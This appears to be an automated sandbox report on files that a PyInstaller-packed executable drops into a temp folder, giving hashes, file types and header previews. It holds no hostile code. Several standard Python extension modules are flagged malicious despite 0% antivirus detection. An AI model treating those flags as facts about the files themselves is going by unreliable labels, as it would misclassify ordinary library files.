                                                                                                                                                                                                                                                    Preview:#ifndef Py_CONFIG_H..#define Py_CONFIG_H..../* pyconfig.h. NOT Generated automatically by configure.....This is a manually maintained version used for the Watcom,..Borland and Microsoft Visual C++ compilers. It is a..standard part of the Python distribution.....WINDOWS DEFINES:..The code specific to Windows should be wrapped around one of..the following #defines....MS_WIN64 - Code specific to the MS Win64 API..MS_WIN32 - Code specific to the MS Win32 (and Win64) API (obsolete, this covers all supported APIs)..MS_WINDOWS - Code specific to Windows, but all versions...MS_WINCE - Code specific to Windows CE..Py_ENABLE_SHARED - Code if the Python core is built as a DLL.....Also note that neither "_M_IX86" or "_MSC_VER" should be used for..any purpose other than "Windows Intel x86 specific" and "Microsoft..compiler specific". Therefore, these should be very rare.......NOTE: The following symbols are deprecated:..NT, USE_DL_EXPORT, USE_DL_IMPORT, DL_EXPORT, DL_IMPORT..MS_CORE_DLL.....WIN3

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\Microsoft.VC90.CRT.manifest

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1050
                                                                                                                                                                                                                                                    Entropy (8bit):5.382088691477628
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:2dtn3mGv+zg4NnEN4XojC6vuVWV5rcb3S:ch35+zg4i0oKWmS
                                                                                                                                                                                                                                                    MD5:FEDFDF2256720BADEFF9205E784B5DC8
                                                                                                                                                                                                                                                    SHA1:014F80BBB14D6F9ED5FCF0757BF2BEF1A22B3B88
                                                                                                                                                                                                                                                    SHA-256:6373FB8261AF01506DC57DEE535A0BE800F3A59B18B0CC1E276807C746329FF6
                                                                                                                                                                                                                                                    SHA-512:F327A925FC067D0CBF06DE57DB791906629509CEE109CB3DBCA2349901EF4E41FD8BF33B56F5FAA647388F6266174960244E4F5CCA260F218440D9A1CC4DAA9B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <noInheritable/>.. <assemblyIdentity name="Microsoft.VC90.CRT" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.30729.4940"/>.. <file hash="c27a4547fb05f4fb4a675713da9fe280405d4e7b" hashalg="SHA1" name="msvcr90.dll"/>.. <file hash="965ba7119c94a3e462b0480492a114411a85c396" hashalg="SHA1" name="msvcp90.dll"/>.. <file hash="216d23bdea36a638d68a9f9287c25008a88285ad" hashalg="SHA1" name="msvcm90.dll"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>.. <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\Microsoft.VC90.MFC.manifest

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):884
                                                                                                                                                                                                                                                    Entropy (8bit):5.328852065805165
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:TMHdtnQEmW5v+8gVuNnhSN46J4b5JL5jb5Fapv18zyiUGXwcGkVtvXV3kQ1ysyG0:2dtn3mGv+8g4NnEN4xnJfaV5rcb3S
                                                                                                                                                                                                                                                    MD5:31F9D6D025D5208F518D6F0DCE5B9DA8
                                                                                                                                                                                                                                                    SHA1:7C5475FFD1EB4F3B73C41375125700F4D6380EA4
                                                                                                                                                                                                                                                    SHA-256:461A32142B53C15852B20372625EF22BCF6D62AB47D0D0936E9112A29477C56E
                                                                                                                                                                                                                                                    SHA-512:9542F980DED6AC649C2C3845BDFD093FF841CE627420C15319CFD1C8C23484B6A5461AFED332AB52F3C2942281CB7F88A8361EE4BED4C51528D4EF05431B4B98
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <noInheritable/>.. <assemblyIdentity name="Microsoft.VC90.MFC" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.21022.8"/>.. <file name="mfc90.dll"/>.. <file name="mfc90u.dll"/>.. <file name="mfcm90.dll"/>.. <file name="mfcm90u.dll"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>.. <supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}"/>.. </application>.. </compatibility>..</assembly>

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_ctypes.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):92672
                                                                                                                                                                                                                                                    Entropy (8bit):6.49118781636951
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:+AcD5TPbhoah4Xg++9bq0nLfkkdk9R/Ec/PnzlHUU:G3+ah4XgrJnd+/PXn5HUU
                                                                                                                                                                                                                                                    MD5:6DAF8B55801A602F84D7D568A142459C
                                                                                                                                                                                                                                                    SHA1:57A80CA9621B282727D45CAA5AE1C5E3C7E93F60
                                                                                                                                                                                                                                                    SHA-256:66D0CB13569E9798B04C5D049CFF25BD4C7C8E7DDD885B62F523D90A65D0CE88
                                                                                                                                                                                                                                                    SHA-512:ABB1C17AEA3EDB46C096CA3D8CBF74C9DCCAD36A7B83BE8CF30697760AD49F3BD3A38DC4FF1F0B715AD7996C3A23EA1C855FFFD62AF01D15935ABC73378DCC2E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................F......W......P......@.......V....Z......A......B....Rich...................PE..L......^...........!.........~......h.....................................................@.........................0@......l+..x...................................................................@*..@...............t............................text............................... ..`.rdata...@.......B..................@..@.data...l"...P... ...2..............@....reloc...............R..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_hashlib.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1101824
                                                                                                                                                                                                                                                    Entropy (8bit):6.872224946601528
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:wYeKOt9Hb/4BGjUIWbL5bEromH/1+Mb7zV+KpPoBsEeMZ1pSJx+waNJ:GQBjIwL98f7b7ZHMLpS3+waNJ
                                                                                                                                                                                                                                                    MD5:55A29EC9721C509A5B20D1A037726CFA
                                                                                                                                                                                                                                                    SHA1:EABA230581D7B46F316D6603EA15C1E3C9740D04
                                                                                                                                                                                                                                                    SHA-256:DBDCF9E8CBA52043B5246AD0D234DA8BA4D6534B326BBBB28A6A391EDF6FA4CE
                                                                                                                                                                                                                                                    SHA-512:E1A2993D4DD5F2E81F299FE158EE6D1F8EF95983113C9BEA9A087E42205FF06AC563762DE5A0B70B535EFE8CF9F980FFC14C1318AAF58DE3644277E3602E0AB3
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FX.Z.9...9...9...A...9...A...9...A...9...A...9...9...9...9...9...A...8...A...9...A...9..Rich.9..........PE..L......^...........!.....n...........r....................................... ............@.............................L....................................p......p...................................@...............P............................text....m.......n.................. ..`.rdata...^.......`...r..............@..@.data............T..................@....reloc......p.......&..............@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_socket.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):46592
                                                                                                                                                                                                                                                    Entropy (8bit):6.53763754638404
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:LRZyVeIHZOETVI+KHtjEGDqFPBesNoC+M6Le+rA8X:deOETV1KH5qFPMC7gLDJ
                                                                                                                                                                                                                                                    MD5:3986998B3753483F8B28C721FEF6F8E4
                                                                                                                                                                                                                                                    SHA1:2EF3C0FAC94C85276721EE2980F49B1BAFEF597D
                                                                                                                                                                                                                                                    SHA-256:CBC23D6C2E3E2950452C7D255DA1452338301A4C9A0B09EBA83287709D2A5000
                                                                                                                                                                                                                                                    SHA-512:258E2805440B36E20702C1447597698EF18A5A7F890CFECE55BD4F797073C87E7BDE659DB3E2474E9B998213D76E2C3D5221659C6827237E06B3B6F4B3643AE6
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......AV2..7\..7\..7\..O..7\..O..7\..O..7\..7]..7\..O..7\..O..7\..O..7\..O..7\.Rich.7\.........................PE..L.....^...........!.....\...Z.......e.......p............................................@............................d...L...d...............................|...`r..............................(...@............p..@............................text....[.......\.................. ..`.rdata..4 ...p..."...`..............@..@.data...x*.......(..................@....reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_ssl.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1422336
                                                                                                                                                                                                                                                    Entropy (8bit):6.8498093470232755
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:6ULSpvnsen1MiGl/hW5nGwwpMFmdLdl3Bp4vuPH5HUMecjhpXu4Fq+KpPZTx63g4:QvnZopheGwXk4i0Mo4ASgHpv5RKHjQj8
                                                                                                                                                                                                                                                    MD5:9BE53B53C1EC6B56663F45464EDFCDE9
                                                                                                                                                                                                                                                    SHA1:F8F5DD5640D594A2B53F5BBD12893C11CF4B7D55
                                                                                                                                                                                                                                                    SHA-256:B572BF14CA3D3E5158B89314B6FE2129A753EDACA1958E252784561F33F9ECDA
                                                                                                                                                                                                                                                    SHA-512:A52727B54A03246B74460A2741324B371CCAA083A4F3123FD1175A3061D3B6707DDBAAA73B3E39435CFFD8D3018EE2DEE8BAD6C58A17FAA55B6D05A3B38EE78B
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................0......&......!..................6......,.:....7......4....Rich...................PE..L....^...........!......................... ............................................@..........................<..D....(............................... .......#...............................'..@............ ...............................text...7........................... ..`.rdata..$.... ......................@..@.data........@.......*..............@....reloc..|.... ......................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_tkinter.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                    Entropy (8bit):6.335150855710927
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:sOWNT81C/gnCUUlUuaFVfmHZrGKcELCDOF3nNCeNXzEmSDEPY:sOWT81C/NtUu6VuZrGKcsCDOF3wIXzPX
                                                                                                                                                                                                                                                    MD5:BC22E37BC6345F1D973718A8E0531258
                                                                                                                                                                                                                                                    SHA1:CF80062912F529384D2BDEACCA035B7C0F69D691
                                                                                                                                                                                                                                                    SHA-256:2001D7FD09812D0BEE6E6FD0041F59120F907634ED36DDDB13E218F31CC61A45
                                                                                                                                                                                                                                                    SHA-512:E424DD8DB22B07E9EAB2B6FA4B977FF8C0FF19F94D3DD418EB8B88027273D276EC146A2E958D5BA649DE54E5C99260AB86DA24D8F096248F302CEEB58E610DA9
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........].Y.<...<...<...D}..<...Dk..<...Dl..<...D{..<...<...<...Da..<...Dz..<...Dy..<..Rich.<..................PE..L......^...........!.....d...<.......m....................................................@.............................L...l...x...............................4...0...............................`...@............................................text....c.......d.................. ..`.rdata... ......."...h..............@..@.data...4...........................@....reloc..P...........................@..B........................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\_win32sysloader.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8192
                                                                                                                                                                                                                                                    Entropy (8bit):5.200731153087669
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:tSVnGV7o5QUEZWm6UkDfvq3X7THIL3kOg:xVU5QUEz6dGLTH
                                                                                                                                                                                                                                                    MD5:0DD18B41247AD35DC34D2B3CC8A2CCFC
                                                                                                                                                                                                                                                    SHA1:24A71BB0FF79BD17BAC561242EAE789E58BDB8A1
                                                                                                                                                                                                                                                    SHA-256:4305325EC0E88CE4064C97E94D16A4131D3C7689946E6936A24D0A78A5B29052
                                                                                                                                                                                                                                                    SHA-512:8554659BCE0309FDABC1AE101963B3B4594DE028AE4E60E3BE12E157EB20AF75A7AAED6F0E042A75C8576F122CD7680DF168C710A00C5109EDE8A0FA0769096F
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M.oC.............J.............................../........................Rich............PE..L....k.^...........!......................... ....;..........................`......................................P&..Z...\"..P....@..H....................P....... ..............................8!..@............ ...............................text...`........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...H....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\bz2.pyd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):71168
                                                                                                                                                                                                                                                    Entropy (8bit):6.739969664926487
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:Ijfp8+QhToyh3Y1rr24S1uBXTZva+j+d8S+fkPPYnLr:IbLuYlq4SuXTZva+j+yZfWC
                                                                                                                                                                                                                                                    MD5:813C016E2898C6A2C1825B586DE0AE61
                                                                                                                                                                                                                                                    SHA1:7113EFCCCB6AB047CDFDB65BA4241980C88196F4
                                                                                                                                                                                                                                                    SHA-256:693DFC5CCB8555A4183D4E196865EF0A766D7E53087C39059D096D03D6F64724
                                                                                                                                                                                                                                                    SHA-512:DBB4ADD301EA127669D5DAC4226CE0F5D6E5B2E50773DB5C8083A9045A3CBA0FCF6EA253A1183A4C87752BD3C5EB84128103A6D8ADE71A7E410831B826D323AD
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.S.9.=K9.=K9.=K..K:.=K0..K:.=K0..K7.=K0..K;.=K0..K>.=K9.<KS.=K0..K1.=K0..K8.=K0..K8.=KRich9.=K................PE..L......^...........!.........P...............................................@............@.............................B...L...P............................0......................................H...@............................................text............................... ..`.rdata.."...........................@..@.data...P'.......$..................@....reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\certifi\cacert.pem

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):282394
                                                                                                                                                                                                                                                    Entropy (8bit):6.051428711388177
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6144:f3fLXd17U58fVZKlWm5plX0PXCRrcMBHADwYCuMslI:f3T37ZZa5LOCRrcMObm
                                                                                                                                                                                                                                                    MD5:C760591283D5A4A987AD646B35DE3717
                                                                                                                                                                                                                                                    SHA1:5D10CBD25AC1C7CED5BFB3D6F185FA150F6EA134
                                                                                                                                                                                                                                                    SHA-256:1A14F6E1FD11EFFF72E1863F8645F090EEC1B616614460C210C3B7E3C13D4B5E
                                                                                                                                                                                                                                                    SHA-512:C192AE381008EAF180782E6E40CD51834E0233E98942BD071768308E179F58F3530E6E883F245A2630C86923DBEB68B624C5EC2167040D749813FEDC37A6D1E6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.# Issuer: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Subject: CN=GlobalSign Root CA O=GlobalSign nv-sa OU=Root CA.# Label: "GlobalSign Root CA".# Serial: 4835703278459707669005204.# MD5 Fingerprint: 3e:45:52:15:09:51:92:e1:b7:5d:37:9f:b1:87:29:8a.# SHA1 Fingerprint: b1:bc:96:8b:d4:f4:9d:62:2a:a8:9a:81:f2:15:01:52:a4:1d:82:9c.# SHA256 Fingerprint: eb:d4:10:40:e4:bb:3e:c7:42:c9:e3:81:d3:1e:f2:a4:1a:48:b6:68:5c:96:e7:ce:f3:c1:df:6c:d4:33:1c:99.-----BEGIN CERTIFICATE-----.MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG.A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv.b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw.MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i.YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT.aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ.jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp.xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\data.exe.manifest

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1341
                                                                                                                                                                                                                                                    Entropy (8bit):5.280300736417038
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:2dtn3ZlglN2v+zg4NnEN4X1mc0+bLg4fNRme5rcb3S:ch3jgX2+zg4i01mJ+bLg4VRmemS
                                                                                                                                                                                                                                                    MD5:585BDFE3FA40F4667674269E31CB3CDB
                                                                                                                                                                                                                                                    SHA1:646DF297C69AEE3E57293521346118EDEBE248E2
                                                                                                                                                                                                                                                    SHA-256:DEC743E7FE1078B06B91D60B03609DE800D81756C61004B8F2F0234D15757903
                                                                                                                                                                                                                                                    SHA-512:A21F6E7E24BD736279A2A49CCEDBD94D2BD366673A5D9F0966CE5A2A5A1A1E2A6BBE68F39A525A8B3083AAC82D1B0A145FED52FBFA1A3505F1A17CA432F6F20D
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">.. <assemblyIdentity name="data" processorArchitecture="x86" type="win32" version="1.0.0.0"/>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="Microsoft.VC90.CRT" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b" type="win32" version="9.0.30729.4940"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity language="*" name="Microsoft.Windows.Common-Controls" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" type="win32" version="6.0.0.0"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{1f676c76-80e1-42

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1156600
                                                                                                                                                                                                                                                    Entropy (8bit):6.52546095742681
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:HMh/PZa3TrShmbjRbf/zxUK4BpifCqY5TcB2sQL+XmDOl:HMh/PZa3HTjtFUKwhqY5TcyL+XmE
                                                                                                                                                                                                                                                    MD5:462DDCC5EB88F34AED991416F8E354B2
                                                                                                                                                                                                                                                    SHA1:6F4DBB36A8E7E594E12A2A9ED4B71AF0FAA762C1
                                                                                                                                                                                                                                                    SHA-256:287BD98054C5D2C4126298EE50A2633EDC745BC76A1CE04E980F3ECC577CE943
                                                                                                                                                                                                                                                    SHA-512:35D21E545CE6436F5E70851E0665193BB1C696F61161145C92025A090D09E08F28272CBF1E271FF62FF31862544025290E22B15A7ACDE1AEA655560300EFE1EC
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........C.R."..."..."......"......."......"...p^.."..\m[.."...pX.."...pN.."...pI.."......"..."...!...pG.>"...p_.."...pY.."...p\.."..Rich."..................PE..L....`1G...........!.....T...N......C+.......p....^x................................g.....@..............................f......x.......x................#.......... ..................................@...............@...........................text....R.......T.................. ..`.data....j...p...H...X..............@....rsrc...x...........................@..@.reloc...1.......2...P..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mfc90u.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1162744
                                                                                                                                                                                                                                                    Entropy (8bit):6.531289155070338
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:ACmuzoNEIkc0FV/IvA+hJpHgbe18MVc/AKDbZOUWJGLaDenEKH:AC9zoNEIkbFV/IvA+hJyq1FVc/FDbZOQ
                                                                                                                                                                                                                                                    MD5:B9030D821E099C79DE1C9125B790E2DA
                                                                                                                                                                                                                                                    SHA1:79189E6F7887CA8F41FB17603BD9C2D46180EFCF
                                                                                                                                                                                                                                                    SHA-256:E30AABB518361FBEAF8068FFC786845EE84ABBF1F71AE7D2733A11286531595A
                                                                                                                                                                                                                                                    SHA-512:2E1EBCBE595C5A1FE09F5933D4BA190081EF343EA313725BB0F8FCBF98079A091AB8C0465EF437B310A1753FFC2D48D9D70EC80D773E7919A6485EF730E93EA1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...........Y...Y...Y...~H.X......X...~H..I...G.>.[.....;.X...G.8.R...G...F...G.).P...~H.P...Y...;...G.'.....G.?.X...G.9.X...G.<.X...RichY...........................PE..L...*`1G...........!.....j...P......a@.............x.................................x....@.........................P....g......x........................#......h.......................................@...............<............................text...kh.......j.................. ..`.data....l.......J...n..............@....rsrc...............................@..@.reloc...1.......2...h..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\mfcm90.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):59904
                                                                                                                                                                                                                                                    Entropy (8bit):6.049630833293433
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:kXS5hxqhOz9XNpOb/AXVuips6Pm550971BVO5nkcwo5ArrwlyQ6mrCHrO1MquTSU:kC/IMZHO0lu+s60VwvrrDmrCrO1HuTR
                                                                                                                                                                                                                                                    MD5:D4E7C1546CF3131B7D84B39F8DA9E321
                                                                                                                                                                                                                                                    SHA1:6B096858723C76848B85D63B4DA334299BECED5B
                                                                                                                                                                                                                                                    SHA-256:C4243BA85C2D130B4DEC972CD291916E973D9D60FAC5CEEA63A01837ECC481C2
                                                                                                                                                                                                                                                    SHA-512:4383E2BC34B078819777DA73F1BD4A88B367132E653A7226ED73F43E4387ED32E8C2BCAFD8679EF5E415F0B63422DB05165A9E794F055AA8024FE3E7CABC66B9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
